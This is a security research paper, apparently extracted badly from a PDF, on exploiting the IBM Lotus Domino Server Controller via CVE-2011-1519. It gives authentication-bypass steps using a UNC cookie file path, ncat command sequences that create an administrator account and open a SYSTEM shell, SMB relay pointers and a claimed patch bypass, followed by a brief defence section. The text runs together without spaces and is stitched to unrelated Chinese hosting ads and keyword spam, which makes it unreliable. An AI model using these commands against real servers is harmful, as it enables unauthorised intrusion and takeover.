LotusDomino:PenetrationThroughtheControllerAlexeySintsovERPscanCompanyEmail:a.
sintsov@erpscan.
comTwitter:@asintsovwww.
erpscan.
comwww.
dsecrg.
comERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com2ContentIntroduction3Stage1:Searchingatarget4Stage2:Chooseofbug5Stage3:Consoleprotocolresearch6Stage4.
ExploitforZDI-‐11-‐110.
10Stage5.
RequiemonSMB.
Exploit2.
12Stage6.
Exploitfor0day.
13Internet16HowtodefendLotusDominoConsole18Conclusions19Links20AboutAuthor21AboutDSecRGResearchcenterofERPScan22AboutERPScan23Th4nkZ24ERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com3IntroductionIBMLotusDominoServertheapplicationserverwithdifferentservicessuchasmailserver,databaseserver,httpserverandothers.
InthisarticlewewilltalkaboutLotusDominoServerControllerthatgivescontrolovertargetserver.
Thisserviceismostcritical,soit'sanimportanttarget.
ThispapperdoesnotdescribeallpossiblevulnerabilitiesandmisconfigurationsofLotusDomino.
ItshowsfewofthepossiblewaystoattackLotusDominoandgetaccesstotheOS.
ThedocumentismeanttodrawattentiontothetypicalproblemsoftheDominoServerControllersecurity.
AlltestshavebeenperformedinLotusDomino8.
5.
2and8.
5.
3onOSWindows.
Whiledoinginternalpen-‐test(sometimesandwhiledoingexternaltoo),youmayfindinterestservice–LotusDominoServerController.
ThisisJAVAbasedapplicationthatgivestoadministratorremotecontroloverDominoserver.
ForusingthisserviceadministratorcanuseLotusDominoConsoleApplication.
Butforaccesstothisserviceyouneedtoknowloginandpassword.
Thisisprettystandardserviceandyoucanfounditifonlynetworkadministratordoesn'tfilterTCPportofthis.
Itisagoodtargetforanattackerorpenetrationtester,becausethisservicegivescontrolnotonlyforDominoServerbutalsocangiveaccesstoOSofserverwithrightsoftheprocessaccount.
ERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com4Stage1:SearchingatargetIBMLotusDominoServerControlleruses2050/tcpportandSSLprotocolforencryptingdataandauthenticateserver.
Soinmostcasesfordetectingthisserviceyouneedtouseanynetworkscanners,likenmap:Nmap–sV192.
168.
0.
0/24–p2050Nmapscanreportfortargethost(192.
168.
0.
13)Hostisup(0.
0010slatency).
PORTSTATESERVICEVERSION2050/tcpopenssl/dominoconsoleLotusDominoConsole(domain:testdomain;description:"DSECRG")MACAddress:00:1A:1B:8A:5F:0E(HewlettPackard)ServiceInfo:OS:Windows/Longhorn/646.
1ThisresulttellsusnotonlyaboutLotusbutalsoaboutOSversion,itmaybeusefulforanyexploits,forexampleifwetalkaboutLotusDomino8.
5.
2FP2CVE-‐2011-‐0915(privateexploitexists),CVE-‐2011-‐0913(privateexploitexist)andCVE-‐2011-‐0914.
Thisexploitsuse"bufferoverflow"errorstoexecutearbitrarycode,butformostcases,especiallyforpenetrationteststhistypesofexploitscanbedangerous(sothisiswhyweneedtoknowOSversion).
Ifwewanttomakepenetration,wecantotryresearchthisbugsandreproduceexploits,butittakestime.
Ithink,mostclientsdonotunderstandpen-‐tester,ifhespendallhistimeofworkonexploitdevelopment(andfinallycrashtheservice…).
Ofcause,wecanbuyprivateexploit,butit'stakesmoney.
ButalsothisversionofLotusisvulnerabletoCVE-‐2011-‐1519(privateexploitexists).
Andlookslikeitissdesignerror…IlikedesignerrorsbecauseitiseasytoexploitandwecanexploititwithoutriskofDoS.
ERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com5Stage2:ChooseofbugSowereproduceCVE-‐2011-‐1519detailshere[1]:TheremoteconsoleintheServerControllerinIBMLotusDomino7.
xand8.
xverifiescredentialsagainstafilelocatedataUNCsharepathnamespecifiedbytheclient,whichallowsremoteattackerstobypassauthentication,andconsequentlyexecutearbitrarycodebyplacingthispathnameintheCOOKIEFILEfield.
NOTE:thismightoverlapCVE-‐2011-‐0920.
ThisvulnerabilitywasfoundbyPatrikKarlssonanddisclosedbyTippingPointZDI[2].
Therearenomoredetails.
Soweneedtomakemoreresearchesforexploitingthisbug.
Itislookslikedonottakesalotoftimeforresearch(ControllerisJAVAbasedapplicationeasytodecompile)andmainthing:thisbuggivesremotecodeexecution.
Idealweaponforanypen-‐tester!
So,let'go…ERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com6Stage3:ConsoleprotocolresearchFirstofallit'simportanttounderstandhowprotocolreallyworksandwhatisitsformatandetc.
Someinformation(simpleauth.
Processwithoutcookies)wecangetfromPatrik'sNSEscriptsfornmap,butforfullpicture(especiallyhowcookiefileprocessingworks)wecangetonlybydecompilingJavaclassforconsole.
ThisfilecanbefoundinLotusDominodistributivebyfollowingthepath:C:\ProgramFiles\IBM\Lotus\Domino\Data\domino\java\dconsole.
jar.
ThisJARisusedforboth:clientandserverside,soherewecanfindallneededinformation.
Let'sdecompileit,andfindcodethathandlesclientauthentication:function'run()'inNewClient.
class.
HereIgivesomecodethatIgotwithhelpofDJdecompiler[3],withmycomments://s1stringwithinputfrom2050/tcpif(s1.
equals("#EXIT"return2;CUTif(s1.
equals("#APPLET"))return6;if(s1.
equals("#COOKIEFILE"))if(stringtokenizer.
hasMoreTokens())cookieFilenamenextwordafter#COOKIEFILEcookieFilenamestringtokenizer.
nextToken().
trim(return7;if(!
1.
equals("#UI"))if(stringtokenizer.
hasMoreTokens())usrlogin,nextworduntilusrstringtokenizer.
nextToken(",").
trim();if(usrnull)return4;if(stringtokenizer.
hasMoreTokens())pwdpasswordpwdstringtokenizer.
nextToken().
trim();return0;CUTERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com7Thispartofcode(ReadFromUser()function)describesmaintokensandcommands'format,itisveryhelpful!
Let'sseenextpartofcode:/*loopwhilereadinginput*/doResultofreadinginputintovariable'i'intiReadFromUser(if(i6)//if#APPLETappletConnectiontrue;continue;CUTfindusernameinadmindata.
xmlandetcuserinfoUserManager.
findUser(usr);if(userinfonull)usernamenotfoundWriteToUser("NOT_REG_ADMIN");continue;if(!
appletConnection)//if#APPLETwasbefore.
.
.
without#APPLET,standardauth.
.
.
flagvrfyPwd.
verifyUserPassword(pwd,userinfo.
userPWD());else//Checkloginandpassword(APPLETMODE)BUGISHERE!
flagverifyAppletUserCookie(usr,pwd)if(flag)//IfAUTHdoneWriteToUser("VALID_USER");ERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com8elseifnopeWriteToUser("WRONG_PASSWORD");while(true);//endloopif(flag)Ifauth.
succsessGetLotusDominoconsoletoauth.
userSo,nowweknow,thatforauthenticationwithcookiefileweneedtouse#APPLETtokenbefore#UI,thencheckingpasswordwillbedonenotbyverifyingUserPassword(pwd,userinfo.
userPWD())butbyverifyingAppletUserCookie(usr,pwd),where'usr'isinputtedusernameand'psw'inputtedpassword.
Let'sseehowverifyingofAppletUserCookie()works://cookieFilenamenexttokenreadafter#COOKIEFILEif(cookieFilenamenullcookieFilename.
length(0)returnflag;//UNCbughere!
FilefilenewFile(cookieFilename)intiint)file.
length();charac[newchar[i1];inputstreamreader.
read(ac,0,i);//s7stringbufferwithdatafromcookiefileStrings7newString(ac)doif((js7.
indexOf("SavethisfileonSMBsharedresource,forexampleonpublicfileserverorcreatesharedresourceonyourworkstationdependsfromfilterrulesinnetwork.
Forexamplewesavedthisfilebythispath:\\fileserver\public\cookie.
xmlNowwecandotheattack.
Weneedjustncatforthat.
DonotforgettorunitwithSSLsupport:ncatssltragetlotus2050#API#APPLET#COOKIEFILE\\fileserver\public\cookie.
xml#USERADDRESSdsecrg#UIusr,pswVALID_USER#EXITLOADCMD.
exe/Cnetuseraddusernamepassword/ADDBeginDataBeginDataCommandhasbeenexecutedonremoteserver.
Use'Live'consoleoptioninfuture,toviewresponsefromserver.
EndDataEndDataERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com11"#APPLET"commandtellserverthatwewantusecookiefileforauthentication.
So,whenwestartauthenticationprocessby"#UI"command,servertriestoopenfilethatwepointby"#COOKIEFILE"andusepasswordfromit.
After"#EXIT"commandClientinterfacewillbestartedandyoucanexecutecommands,forexamplebyusingoldgoodLOADcommand[4].
BydefaultyouwillgetJavainterface,soweneedtousepureAPI,withoutJavaoutput.
Forthisyouneedtouse"#API"before"#EXIT".
Commandwillbeexecuted,butwecan'tseeoutput.
Butifadministratorsetsecureconsoleoption(thatisrecommendationinZDIadvisoryforthisbug!
),wecan'tuseLOADorTELLcommands.
Butifouruserhasenoughprivileges,wecangetshellbyusingncatssltragetlotus2050#API#APPLET#COOKIEFILE\\fileserver\public\cookie.
xml#USERADDRESSdsecrg#UIusr,pswVALID_USER#EXIT$whoamiwhoamiBeginDataMicrosoftWindows[Version6.
1.
7601]Copyright(c)2009MicrosoftCorporation.
Allrightsreserved.
C:\Lotus\Domino\data>whoamiNTAUTHORITY\SYSTEMC:\Lotus\Domino\data>Theseprivilegesarenotsetbydefaults,butiftheyareset,wecanexecutesystemcommandswithoutLOADandTELLevenifconsoleisprotectedby'SetSecure'options.
Ifyouwanttochecktheseprivileges,youshouldopenadmindata.
xmlandcheckfortag,ifthereis4,25or26numbersintheline,itmeansthatprivilegesareset.
ERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com12Stage5.
RequiemonSMB.
Exploit2.
Ok,nowwecanexploitthisissuewith'SetSecure'options.
ButwhatwecandoifwehavenotenoughprivilegesforexecutingsystemcommandstooDonotgiveup!
JustrememberaboutSMBRelay[5].
Ofcourse,ifwecanuseUNCasapathtothecookiefile,itisnormal,thatLotusservertriestomakeNTLMauthenticationonevilhost.
IfLotusServerrunswithdomainaccountthathaslocaladministratorsprivilegesorthesameaccountusedinanotherserver(reserveserver,foranexample)wecanuseSMBRelayattack.
Itisveryeasybyusingmeatsploitmodule,soIwillnottalkaboutitanymore.
ERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com13Stage6.
Exploitfor0day.
NowfewwordsaboutfixinLotusDomino8.
5.
3:IBMjustaddbeforeanyCOOKIEFILEinput,sonowitwillbenot'\\evil\cookie\file'but'.
\\evil\cookie\file'Sowecan'tuseSMBshares.
Also,IBMaddsSSLclientauthenticationtotheconsoleserver.
SonowweneedtohavevalidSSLclient'scertificatebeforeconnectto2050.
Additionalproblem:evenwhenpatchisnotinstalleditisnotalwayspossibletouseUNCiftargetserverisinanothernetworkssegmentand/orSMBprotocolsarefiltered.
ForexampletargetserverisinanothercompanyfilialorintheInternet.
Inthiswaytargetservercan'tconnectbySMBtoyourSMBresource.
Patchbypass:Problemisinownpseudo-‐XMLparser,thatIBMwroteforparsingCOOKIEFILE.
Theformatofcookiefilemustbe(inidealworldofXML):Butinreal,when'XML'parserhandlescookiefile,ittriestofind"404NotFound2011-‐08-‐2209:19:1610.
10.
10.
1014613010.
10.
9.
947001400BadRequestItisimportanttomaketwoHTTPrequests,becauseweneedtohave'space'byteafter'functiononLoadConsole(){alert("Connected");}Inthis'exploit'wejustusedcosole.
jarbecauseofvalidcertificatesinit,soservercontrollercanauthenticateusbyourcertificateandwecanandspoofpathtocookiefilewithinjected'XML'.
Andmoreapplettakehostaddresfromcodebase,soyouneedtouseport-‐forwardingfrom127.
0.
0.
1:2050toremote_target:2050.
ERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com16InternetJustsomescreenshot.
.
.
forfun…Pic1.
VulnerableLotusDominoControlleron.
GOVPic2.
DefaultSSLcert.
on.
GOVERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com17ERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com18HowtodefendLotusDominoConsoleFirstofall,thisserviceisforadminsonly,soyoushouldcreaterulesonfirewallandfilteroutthisTCPport2050.
Secondthingthatyoushoulddoistoinstallpatches.
Butthisisnotall.
DonotforgetaboutconsolepasswordthatcanbesetandwillhelptopreventfromusingdangerouscommandslikeLOADandTELL.
Andfinallyitwouldbegreattoauditadmindata.
xmlfilesonsimplepasswords(hash)andprivilegesthatusershave.
TheseareminimumactionsthatcansaveyourLotusserver.
Ofcourse,youshouldalsocheckprocessaccountinOS,andfilterotherprotocolslikeSMBifitisnotnecessaryforbusiness.
ERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com19ConclusionsFinallywehavefewwaystoexploitthisbug(ZDI-‐11-‐110)fordifferentcases,evenifpatchfromIBMisinstalled,soitisbecome0dayagain!
Alsowegetnewexploitforpen-‐testersthatcanbeeasilyusedinarealprojectandgiveniceresults.
Ihopethisarticlecouldbehelpfulforpenetrationtesters.
AttheendIwanttosayTHANKStoZDIteamandPatrikKarlssonforthebeautifulbug!
BestRegards.
AlexeySintsovERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com20Links[1]http://cve.
mitre.
org/cgi-‐bin/cvename.
cginame=CVE-‐2011-‐1519[2]http://www.
zerodayinitiative.
com/advisories/ZDI-‐11-‐110/[3]http://www.
neshkov.
com/dj.
html[4]http://dsecrg.
com/pages/pub/show.
phpid=24[5]http://dsecrg.
blogspot.
com/2011/01/new-‐blog-‐section-‐passthehash-‐bible.
htmlERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com21AboutAuthorAlexeySintsovMorethen10yearsinITsecurityarea.
CurrentlyworkintheleadingITsecuritycompanyERPScanasdirectorofISauditdepartment.
AlexeyisoneofthemainsecurityresearchersinDSecRG(DigitalSecurityResearchGroup).
OrganizerofRussianDefconGroup(DCG#7812).
HealsowritearticlesforRussianITsecuritymagazine'XAKEP'andmakepresentationsonconferences(CONFidence,HackInTheBox,ZeroNights,ChaosConstruction,PCIDSSRussiaandothers).
Hispublicworks:http://www.
exploit-‐db.
com/author/a=549ERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com22AboutDSecRGResearchcenterofERPScanDSecRGLeadingSAPAGpartnerindiscoveringandsolvingsecurityvulnerabilities.
ERPScanexpertiseisbasedonresearchconductedbytheDSecRGresearchcenterasubdivisionofERPScancompany.
ItdealswithvulnerabilityresearchandanalysisinbusinesscriticalapplicationsparticularlyinSAPandpublisheswhitepapersaboutit.
SAPAGgivesacknowledgementsforsecurityresearchersfromDSecRGalmosteverymonthontheirsite.
NowDSecRGexpertsareonthefirstplaceinSAPpublicacknowledgementschart.
DSecRGexpertsarefrequentspeakersinprimeInternationalconferencesheldinUSA,EUROPE,CEMEAandASIAsuchasBlackHat,HITB,SourceBarcelona,DeepSEC,Confidence,Troopers,T2,InfoSecurity.
DSecRGresearchersgainmultipleacknowledgementsfrombiggestsoftwarevendorslikeSAP,Oracle,IBM,VMware,Adobe,HP,Kasperskiy,Apache,Alcatelandothersforfindingvulnerabilitiesintheirsolutions.
DSecRGhashigh-‐qualifiedexpertsinstaffwhohaveexperienceindifferentfieldsofsecurity,fromWebapplicationsandreverseengineeringtoSCADAsystems,accumulatingtheirexperiencetoconductresearchinSAPsystemsecurity.
E-‐mail:info@dsecrg.
comWeb:www.
dsecrg.
comERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com23AboutERPScanERPScanisaninnovativecompanyengagedintheresearchofERPsecurityanddevelopsproductsforERPsystemsecurityassessment.
Apartfromthisthecompanyrendersconsultingservicesforsecureconfiguration,developmentandimplementationofERPsystems,andconductscomprehensiveassessmentsandpenetrationtestingofcustomsolutions.
Ourflagshipproductsare"ERPScanSecurityScannerforSAP"andservice"ERPScanOnline"whichcanhelpcustomerstoperformautomatedsecurityassessmentsandcompliancechecksforSAPsolutions.
Contact:info[at]erpscan[dot]comhttp://www.
erpscan.
comERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com24Th4nkZJustagainandmore:PatrikKarlssongoodjobasalways!
AlexandrMinojenko[DSecRG]–fortipsandadvises.
AlexandrPolyakov[DSecRG]–forthetemplate8)Thankstoallmyteam:Alexey"GreenDog"Tyurin,GlebCherbov,DmitryChastuhin,DmitriEvdokimovAndalsooneDisRespecttoRuslanKarmanov(heisrudeguy,don'tlikehim)
妮妮云的来历妮妮云是 789 陈总 张总 三方共同投资建立的网站 本着“良心 便宜 稳定”的初衷 为小白用户避免被坑妮妮云的市场定位妮妮云主要代理市场稳定速度的云服务器产品,避免新手购买云服务器的时候众多商家不知道如何选择,妮妮云就帮你选择好了产品,无需承担购买风险,不用担心出现被跑路 被诈骗的情况。妮妮云的售后保证妮妮云退款 通过于合作商的友好协商,云服务器提供2天内全额退款,超过2天不退款 物...
香港ctg云服务器香港ctg云服务器官网链接 点击进入妮妮云官网优惠活动 香港CTG云服务器地区CPU内存硬盘带宽IP价格购买地址香港1核1G20G3M5个19元/月点击购买香港2核2G30G5M10个40元/月点击购买香港2核2G40G5M20个450元/月点击购买香港4核4G50G6M30个80元/月点击购买香...
极光KVM怎么样?极光KVM本月主打产品:美西CN2双向,1H1G100M,189/年!在美西CN2资源“一兆难求”的大环境下,CN2+大带宽 是很多用户的福音,也是商家实力的象征。目前,极光KVM在7月份的促销,7月促销,美国CN2 GIA大带宽vps,洛杉矶联通cuvip,14元/月起;香港CN2+BGP仅19元/月起,这次补货,机会,不要错过了。点击进入:极光KVM官方网站地址极光KVM七月...
404notfound为你推荐
iphone越狱后怎么恢复苹果手机越狱之后能恢复原来吗?奇虎论坛奇虎是中国的吗?2012年正月十五山西省太原市2012年正月十五活动的相关情况二层交换机集线器和二层交换机,三层交换机的区别机械键盘轴机械键盘蓝轴有什么作用如何快速收录如何让百度快速收录php购物车PHP中用json实现购物车功能,怎么实现手工杀毒有没有人会手动杀毒.可否详解下怎样申请支付宝怎么申请支付宝请客网中国有几种请客的原因
如何注册域名 windows虚机 中文域名查询 vps代理 域名服务器是什么 踢楼 256m内存 mediafire下载工具 缓存服务器 谷歌香港 日志分析软件 qq数据库下载 e蜗 新家坡 33456 新睿云 联通网站 丽萨 lick atom处理器 更多